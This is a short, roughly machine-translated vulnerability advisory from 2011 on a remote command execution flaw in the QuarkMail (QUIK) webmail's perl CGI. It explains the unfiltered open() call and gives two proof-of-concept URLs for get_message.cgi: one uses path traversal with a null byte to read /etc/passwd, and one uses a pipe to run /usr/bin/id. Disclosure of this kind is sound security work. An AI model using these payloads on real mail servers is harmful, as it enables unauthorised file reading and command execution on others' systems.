QUIK email(QuarkMail)remote command execution vulnerabilities and fixes-vulnerability warning-the black bar safety net

ID MYHACK58:62201129728
Type myhack58
Reporter 佚名
Modified 2011-03-15T00:00:00


Vulnerability Description: The QUIK e-mail(QuarkMail Beijing Xiong Zhi weiye science and Technology Company launched the e-mail system, is widely used in various areas of email solutions, webmail section Using perl cgi to write, but 80sec in their system found a major security vulnerability leads to remote users in the mail system to the current process identity to execute arbitrary commands, to further control the host or the system.

Vulnerability manufacturers: http://www.ipmotor.com/

Vulnerability analysis: QuarkMail the mistake of using perl's open function to open the file for the template and other functions, but its user of the incoming parameters are not doing an effective filter, resulting in a command execution vulnerability.

Vulnerability proof: log into the system after accessing the following URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=1 0&max=2&lang=gb&tf=../../../../../../../etc/passwd%0 0&id=2&sort=0&read_flag=yes

You can get the system account files, access the following URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=1 0&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%0 0&id=2&sort=0&read_flag=yes

In the/usr/bin/id File Open is performed, and the results are returned, the user can use a sequence of operations to get the system full access rights.

Vulnerability solution: please wait for the official patch.